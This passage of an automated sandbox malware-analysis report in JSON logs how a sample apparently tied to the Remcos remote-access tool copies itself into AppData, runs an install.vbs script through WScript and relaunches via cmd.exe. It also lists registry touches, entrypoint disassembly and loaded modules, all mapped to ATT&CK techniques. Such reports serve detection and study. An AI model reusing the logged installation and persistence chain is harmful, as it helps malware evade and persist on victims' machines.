\"HKCU\\CLSID\\{208D2C60-3AEA-1069-A2D7-08002B30309D}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Recycle Bin\" (Path: \"HKCU\\CLSID\\{645FF040-5081-101B-9F08-00AA002F954E}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Control Panel\" (Path: \"HKCU\\CLSID\\{26EE0668-A00A-44D7-9371-BEB064C98683}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"UsersLibraries\" (Path: \"HKCU\\CLSID\\{031E4825-7B94-4DC3-B131-E946B44C8DD5}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"CLSID_SearchFolder\" (Path: \"HKCU\\CLSID\\{04731B67-D933-450A-90E6-4ACD2E9408FE}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Microsoft OneNote Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{0875DCB6-C686-4243-9432-ADCCF0B9F2D7}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"IE History and Feeds Shell Data Source for Windows Search\" (Path: \"HKCU\\CLSID\\{11016101-E366-4D22-BC06-4ADA335C892B}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"@C:\\Program Files (x86)\\Microsoft Office\\Office15\\MAPISHELL.DLL,-110\" (Path: \"HKCU\\CLSID\\{138508BC-1E03-49EA-9C8F-EA9E1D05D65D}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Public Folder\" (Path: \"HKCU\\CLSID\\{4336A54D-038B-4685-AB02-99BB52D3FB8B}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Control Panel command object for Start menu and desktop\" (Path: \"HKCU\\CLSID\\{5399E694-6CE5-4D6C-8FCE-1D8870FDCBA0}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-110\" (Path: \"HKCU\\CLSID\\{89D83576-6BD1-4C86-9454-BEB04E94C819}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"DXP\" (Path: \"HKCU\\CLSID\\{8FD8B88D-30E1-4F25-AC2B-553D3D65F0EA}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"CLSID_SearchHome\" (Path: \"HKCU\\CLSID\\{9343812E-1C37-4A49-A12E-4B2D810D956B}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Windows Search Service Media Center Namespace Extension Handler\" (Path: \"HKCU\\CLSID\\{98D99750-0B8A-4C59-9151-589053683D73}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Other Users Folder\" (Path: \"HKCU\\CLSID\\{B4FB3F98-C1EA-428D-A78A-D1F5659CBA93}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"@%systemroot%\\system32\\mssvp.dll,-112\" (Path: \"HKCU\\CLSID\\{BD7A2E7B-21CB-41B2-A086-B309680C6B7E}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"CLSID_StartMenuProviderFolder\" (Path: \"HKCU\\CLSID\\{DAF95313-E44D-46AF-BE1B-CBACEA2C3065}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"CLSID_StartMenuPathCompleteProviderFolder\" (Path: \"HKCU\\CLSID\\{E345F35F-9397-435C-8F95-4E922C26259E}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Games Explorer\" (Path: \"HKCU\\CLSID\\{ED228FDF-9EA8-4870-83B1-96B02CFE0D52}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Computers and Devices\" (Path: \"HKCU\\CLSID\\{F02C1A0D-BE21-4350-88B0-7367FC96EF3C}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"Sticky Notes Namespace Extension for Windows Desktop Search\" (Path: \"HKCU\\CLSID\\{F3F5824C-AD58-4728-AF59-A1EBE3392799}\\SHELLFOLDER\")\n \"WScript.exe\" touched \"VB Script Language\" (Path: \"HKCU\\CLSID\\{B54F3741-5B07-11CF-A4B0-00AA004A55E8}\\TREATAS\")\n \"WScript.exe\" touched \"Constructor that allows hosts better control creating scriptlets\" (Path: \"HKCU\\CLSID\\{06290BD1-48AA-11D2-8432-006008C3FBFC}\\TREATAS\")\n \"WScript.exe\" touched \"Multi Language Support\" (Path: \"HKCU\\CLSID\\{275C23E2-3747-11D0-9FEA-00AA003F8646}\\TREATAS\")\n \"WScript.exe\" touched \"FileSystem Object\" (Path: \"HKCU\\CLSID\\{0D43FE01-F093-11CF-8940-00A0C9054228}\\TREATAS\")\n \"WScript.exe\" touched \"Windows Script Host Shell Object\" (Path: \"HKCU\\CLSID\\{72C24DD5-D70A-438B-8A42-98424B88AFB8}\\TREATAS\")", "origin": "Registry Access", "attck_id": "T1546.015", "attck_id_wiki": "https://attack.mitre.org/techniques/T1546/015"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-123", "type": 6, "relevance": 3, "name": "Calls an API typically used to copy file from one location to another", "description": "\"hab.exe\" called \"CopyFileW\" to copy %TEMP%\\hab.exe to new location %APPDATA%\\remcos\\remcos.exe (UID: 00000000-00004488)\n \"hab.exe\" called \"CopyFileW\" to copy %TEMP%\\hab.exe to new location %APPDATA%\\remcos\\remcos.exe (UID: 00000000-00004300)\n \"hab.exe\" called \"CopyFileW\" to copy %TEMP%\\hab.exe to new location %APPDATA%\\remcos\\remcos.exe (UID: 00000000-00006020)", "origin": "API Call", "attck_id": "T1005", "attck_id_wiki": "https://attack.mitre.org/techniques/T1005"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-153", "name": "Uses 32 bit executable PE", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"hab.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE\n \"remcos.exe\" has flags like IMAGE_FILE_32BIT_MACHINE\n IMAGE_FILE_EXECUTABLE", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-96", "name": "PE file entrypoint instructions", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859\" file has an entrypoint instructions - \"push\t0x402c10,call\t0x40126c,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,pop\tesp,cmp\tah, ah,jle\t0x4012ed,cmp\tesi, 0x8dad9842,and\tesi, dword ptr [edi + 0xe3d952],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], cl,push\tes,inc\teax,add\tdword ptr [ecx], 0x6e,outsd\tdx, dword ptr [esi],outsb\tdx, byte ptr [esi],add\tbyte ptr [eax - 0x42], dl,mov\tal, byte ptr [eax],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,push\tss,aad\t0xe,mov\tcl, 0x10,jbe\t0x4012c9,mov\tbyte ptr [0x52f8a347], al,xor\teax, 0x902d21f5,cld\t,pop\tesi,pop\tesi,\"\n \"hab.exe\" file has an entrypoint instructions - \"push\t0x402c10,call\t0x40126c,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,pop\tesp,cmp\tah, ah,jle\t0x4012ed,cmp\tesi, 0x8dad9842,and\tesi, dword ptr [edi + 0xe3d952],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], cl,push\tes,inc\teax,add\tdword ptr [ecx], 0x6e,outsd\tdx, dword ptr [esi],outsb\tdx, byte ptr [esi],add\tbyte ptr [eax - 0x42], dl,mov\tal, byte ptr [eax],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,push\tss,aad\t0xe,mov\tcl, 0x10,jbe\t0x4012c9,mov\tbyte ptr [0x52f8a347], al,xor\teax, 0x902d21f5,cld\t,pop\tesi,pop\tesi,\"\n \"remcos.exe\" file has an entrypoint instructions - \"push\t0x402c10,call\t0x40126c,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,xor\tbyte ptr [eax], al,add\tbyte ptr [eax], al,cmp\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,pop\tesp,cmp\tah, ah,jle\t0x4012ed,cmp\tesi, 0x8dad9842,and\tesi, dword ptr [edi + 0xe3d952],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,add\tbyte ptr [ecx], al,add\tbyte ptr [eax], al,add\tbyte ptr [eax], cl,push\tes,inc\teax,add\tdword ptr [ecx], 0x6e,outsd\tdx, dword ptr [esi],outsb\tdx, byte ptr [esi],add\tbyte ptr [eax - 0x42], dl,mov\tal, byte ptr [eax],add\tbyte ptr [eax], al,add\tbyte ptr [eax], al,dec\tesp,xor\tdword ptr [eax], eax,push\tss,aad\t0xe,mov\tcl, 0x10,jbe\t0x4012c9,mov\tbyte ptr [0x52f8a347], al,xor\teax, 0x902d21f5,cld\t,pop\tesi,pop\tesi,\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-176", "type": 6, "relevance": 1, "name": "Calls an API typically used to retrieve function addresses", "description": "details too long to display", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-8", "type": 6, "relevance": 1, "name": "Looks up procedures from modules (excluding apphelp.dll, kernel32.dll, user32.dll, gdi32.dll, ole32.dll, comctl32.dll, uxtheme.dll, oleaut32.dll, version.dll, msctfime.ime)", "description": "\"10001100f4127474@rsaenh.dll\"\n \"10001100e0127474@rsaenh.dll\"\n \"08000900d4127474@rsaenh.dll\"\n \"0b000c00c8127474@rsaenh.dll\"\n \"0c000d00b8127474@rsaenh.dll\"\n \"0d000e00a8127474@rsaenh.dll\"\n \"0d000e0098127474@rsaenh.dll\"\n \"0b000c008c127474@rsaenh.dll\"\n \"0b000c0080127474@rsaenh.dll\"\n \"09000a0074127474@rsaenh.dll\"\n \"09000a0068127474@rsaenh.dll\"\n \"0c000d0058127474@rsaenh.dll\"\n \"0a000b004c127474@rsaenh.dll\"\n \"1000110038127474@rsaenh.dll\"\n \"0d000e0028127474@rsaenh.dll\"\n \"0a000b001c127474@rsaenh.dll\"\n \"1100120008127474@rsaenh.dll\"\n \"0b000c00fc117474@rsaenh.dll\"\n \"0c000d00ec117474@rsaenh.dll\"\n \"0e000f00dc117474@rsaenh.dll\"\n \"0e000f00cc117474@rsaenh.dll\"\n \"0e000f00bc117474@rsaenh.dll\"\n \"0e000f00ac117474@rsaenh.dll\"\n \"0e000f009c117474@rsaenh.dll\"\n \"0f0010008c117474@rsaenh.dll\"", "origin": "API Call", "attck_id": "T1129", "attck_id_wiki": "https://attack.mitre.org/techniques/T1129"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-128", "type": 6, "relevance": 5, "name": "Calls an API typically used to create a process", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateProcessW\" with parameter \"\"C:\\02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\"\" - (UID: 00000000-00004836)\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00004744)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00003504)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WScript.exe\" \"%TEMP%\\install.vbs\"\" - (UID: 00000000-00004488)\n \"WScript.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /c \"%APPDATA%\\remcos\\remcos.exe\"\" - (UID: 00000000-00005392)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\remcos\\remcos.exe\" - (UID: 00000000-00005488)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00005656)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00005744)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WScript.exe\" \"%TEMP%\\install.vbs\"\" - (UID: 00000000-00004300)\n \"WScript.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /c \"%APPDATA%\\remcos\\remcos.exe\"\" - (UID: 00000000-00003576)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\remcos\\remcos.exe\" - (UID: 00000000-00005944)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00003476)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00003996)\n \"hab.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\WScript.exe\" \"%TEMP%\\install.vbs\"\" - (UID: 00000000-00006020)\n \"WScript.exe\" called \"CreateProcessW\" with parameter \"\"%WINDIR%\\System32\\cmd.exe\" /c \"%APPDATA%\\remcos\\remcos.exe\"\" - (UID: 00000000-00003016)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"%APPDATA%\\remcos\\remcos.exe\" - (UID: 00000000-00002916)\n \"remcos.exe\" called \"CreateProcessW\" with parameter \"\"%TEMP%\\hab.exe\"\" - (UID: 00000000-00002208)", "origin": "API Call", "attck_id": "T1106", "attck_id_wiki": "https://attack.mitre.org/techniques/T1106"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-70", "type": 6, "relevance": 10, "name": "Scanning for window names", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" searching for class \"Shell_TrayWnd\"\n \"hab.exe\" searching for class \"Shell_TrayWnd\"\n \"remcos.exe\" searching for class \"Shell_TrayWnd\"", "origin": "API Call", "attck_id": "T1010", "attck_id_wiki": "https://attack.mitre.org/techniques/T1010"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-122", "type": 6, "relevance": 3, "name": "Calls an API typically used to create a directory", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004744)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\remcos (UID: 00000000-00004488)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004488)\n \"WScript.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005392)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00005656)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\remcos (UID: 00000000-00004300)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00004300)\n \"WScript.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003576)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003476)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %APPDATA%\\remcos (UID: 00000000-00006020)\n \"hab.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00006020)\n \"WScript.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00003016)\n \"remcos.exe\" called \"CreateDirectoryW\" with parameter %LOCALAPPDATA%\\Microsoft\\Windows\\Caches (UID: 00000000-00002208)", "origin": "API Call", "attck_id": "T1074.001", "attck_id_wiki": "https://attack.mitre.org/techniques/T1074/001"}, {"threat_level_human": "informative", "category": "General", "identifier": "registry-20", "type": 3, "relevance": 5, "name": "Reads Windows Trust Settings", "description": "\"WScript.exe\" (Path: \"HKCU\\SOFTWARE\\MICROSOFT\\WINDOWS\\CURRENTVERSION\\WINTRUST\\TRUST PROVIDERS\\SOFTWARE PUBLISHING\"; Key: \"STATE\")", "origin": "Registry Access", "attck_id": "T1012", "attck_id_wiki": "https://attack.mitre.org/techniques/T1012"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-80", "relevance": 1, "name": "PE file contains executable sections", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859\" has an executable section named \".text\"\n \"hab.exe\" has an executable section named \".text\"\n \"remcos.exe\" has an executable section named \".text\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "static-95", "name": "PE file contains writable sections", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859\" has an writable section named \".data\"\n \"hab.exe\" has an writable section named \".data\"\n \"remcos.exe\" has an writable section named \".data\"", "origin": "Static Parser"}, {"threat_level_human": "informative", "category": "General", "identifier": "api-7", "type": 6, "relevance": 1, "name": "Loads modules at runtime", "description": "\"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70210000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"KERNEL32\" at base 756f0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"API-MS-WIN-CORE-LOCALIZATION-L1-2-1\" at base 0\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\TEMP\\VXOLE32.DLL\" at base 69870000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"ADVAPI32.DLL\" at base 75070000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c30000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"DWMAPI.DLL\" at base 73ac0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"COMCTL32\" at base 73c00000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"UXTHEME.DLL\" at base 73ae0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 753b0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"CLBCATQ.DLL\" at base 75200000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 75290000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"SHELL32\" at base 76090000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"NTDLL\" at base 76e30000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"IPHLPAPI\" at base 73090000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"ADVAPI32\" at base 75070000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"DHCPCSVC.DLL\" at base 72f20000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"IPHLPAPI.DLL\" at base 73090000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"RPCRT4.DLL\" at base 75150000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74be0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73ae0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"OLEAUT32.DLL\" at base 75ed0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"SXS.DLL\" at base 74c40000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"CRYPTSP.DLL\" at base 74740000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 744d0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"OLE32.DLL\" at base 753b0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"PROPSYS.DLL\" at base 73870000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"COMCTL32.DLL\" at base 73c00000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"SHELL32.DLL\" at base 76090000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73870000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"NTMARTA.DLL\" at base 741a0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75130000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"PROFAPI.DLL\" at base 74d40000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"APPHELP.DLL\" at base 74be0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6dd60000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76090000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 74e40000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76ce0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"SETUPAPI.DLL\" at base 75a10000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"SECUR32.DLL\" at base 74a70000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74e30000\n \"02bddbf5ea7be0c240f6f4fce6784938e6dd4339f29a65e1e87aade246cad859.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 710f0000\n \"hab.exe\" loaded module \"CRYPTBASE.DLL\" at base 74c30000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\UXTHEME.DLL\" at base 73ae0000\n \"hab.exe\" loaded module \"OLEAUT32.DLL\" at base 75ed0000\n \"hab.exe\" loaded module \"SXS.DLL\" at base 74c40000\n \"hab.exe\" loaded module \"CRYPTSP.DLL\" at base 74740000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\RSAENH.DLL\" at base 744d0000\n \"hab.exe\" loaded module \"ADVAPI32.DLL\" at base 75070000\n \"hab.exe\" loaded module \"DWMAPI.DLL\" at base 73ac0000\n \"hab.exe\" loaded module \"COMCTL32\" at base 73c00000\n \"hab.exe\" loaded module \"UXTHEME.DLL\" at base 73ae0000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\OLE32.DLL\" at base 753b0000\n \"hab.exe\" loaded module \"CLBCATQ.DLL\" at base 75200000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\MSCTF.DLL\" at base 75290000\n \"hab.exe\" loaded module \"SHELL32\" at base 76090000\n \"hab.exe\" loaded module \"KERNEL32\" at base 756f0000\n \"hab.exe\" loaded module \"NTDLL\" at base 76e30000\n \"hab.exe\" loaded module \"IPHLPAPI\" at base 73090000\n \"hab.exe\" loaded module \"ADVAPI32\" at base 75070000\n \"hab.exe\" loaded module \"DHCPCSVC.DLL\" at base 72f20000\n \"hab.exe\" loaded module \"IPHLPAPI.DLL\" at base 73090000\n \"hab.exe\" loaded module \"RPCRT4.DLL\" at base 75150000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\APPHELP.DLL\" at base 74be0000\n \"hab.exe\" loaded module \"KERNEL32.DLL\" at base 756f0000\n \"hab.exe\" loaded module \"USER32.DLL\" at base 75510000\n \"hab.exe\" loaded module \"GDI32.DLL\" at base 75f90000\n \"hab.exe\" loaded module \"SHELL32.DLL\" at base 76090000\n \"hab.exe\" loaded module \"MSVCRT.DLL\" at base 75fe0000\n \"hab.exe\" loaded module \"MSVCP60.DLL\" at base 6ae30000\n \"hab.exe\" loaded module \"SHLWAPI.DLL\" at base 755e0000\n \"hab.exe\" loaded module \"WINMM.DLL\" at base 6f960000\n \"hab.exe\" loaded module \"WS2_32.DLL\" at base 77030000\n \"hab.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L1-1-0.DLL\" at base 74e40000\n \"hab.exe\" loaded module \"URLMON.DLL\" at base 76ce0000\n \"hab.exe\" loaded module \"GDIPLUS.DLL\" at base 73620000\n \"hab.exe\" loaded module \"WININET.DLL\" at base 75bc0000\n \"hab.exe\" loaded module \"PSAPI.DLL\" at base 75bb0000\n \"hab.exe\" loaded module \"OLE32.DLL\" at base 753b0000\n \"hab.exe\" loaded module \"PROPSYS.DLL\" at base 73870000\n \"hab.exe\" loaded module \"COMCTL32.DLL\" at base 73c00000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\PROPSYS.DLL\" at base 73870000\n \"hab.exe\" loaded module \"NTMARTA.DLL\" at base 741a0000\n \"hab.exe\" loaded module \"API-MS-WIN-SECURITY-SDDL-L1-1-0.DLL\" at base 75130000\n \"hab.exe\" loaded module \"PROFAPI.DLL\" at base 74d40000\n \"hab.exe\" loaded module \"APPHELP.DLL\" at base 74be0000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHDOCVW.DLL\" at base 6dd60000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\SHELL32.DLL\" at base 76090000\n \"hab.exe\" loaded module \"API-MS-WIN-CORE-LOCALREGISTRY-L1-1-0.DLL\" at base 756f0000\n \"hab.exe\" loaded module \"SETUPAPI.DLL\" at base 75a10000\n \"hab.exe\" loaded module \"%WINDIR%\\SYSTEM32\\URLMON.DLL\" at base 76ce0000\n \"hab.exe\" loaded module \"SECUR32.DLL\" at base 74a70000\n \"hab.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-SHLWAPI-L1-1-0.DLL\" at base 74e30000\n \"hab.exe\" loaded module \"API-MS-WIN-DOWNLEVEL-ADVAPI32-L2-1-0.DLL\" at base 710f0000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-SYNCH-L1-2-0\" at base 70210000\n \"WScript.exe\" loaded module \"API-MS-WIN-CORE-FIBERS-L1-1-1\" at base 0\n \"WScript.exe\" loaded module \"KERNEL32\" at base 756f0000\n \"WScript.exe\" loaded module 